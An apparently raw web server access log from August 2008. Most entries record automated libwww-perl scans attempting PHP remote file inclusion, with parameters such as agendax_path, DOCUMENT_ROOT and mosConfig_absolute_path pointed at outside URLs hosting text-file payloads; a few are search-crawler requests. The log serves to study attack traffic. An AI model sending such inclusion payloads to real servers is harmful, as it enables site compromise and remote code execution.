82.165.39.186 - - [01/Aug/2008:21:16:35 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
84.22.143.171 - - [01/Aug/2008:21:16:45 -0500] "GET /logs/images/errors.php?error=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.75"
84.22.143.171 - - [01/Aug/2008:21:16:46 -0500] "GET /images/errors.php?error=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.75"
74.6.18.231 - - [01/Aug/2008:21:19:24 -0500] "GET /logs/access_log.1212883200 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.165.39.186 - - [01/Aug/2008:21:20:42 -0500] "GET /logs/access_log.1212883200//modules/agendax/addevent.inc.php?agendax_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.76"
74.6.18.231 - - [01/Aug/2008:21:22:48 -0500] "GET /logs/access_log.1203638400 HTTP/1.0" 200 257953 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.227.48.112 - - [01/Aug/2008:21:24:06 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 93669 "-""libwww-perl/5.805"
212.227.48.112 - - [01/Aug/2008:21:24:06 -0500] "GET /?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
82.165.39.186 - - [01/Aug/2008:21:26:25 -0500] "GET /logs/access_log.1213142400//modules/agendax/addevent.inc.php?agendax_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.76"
58.65.228.5 - - [01/Aug/2008:21:29:41 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 331 "-""Mozilla/5.0"
58.65.228.5 - - [01/Aug/2008:21:29:41 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 331 "-""Mozilla/5.0"
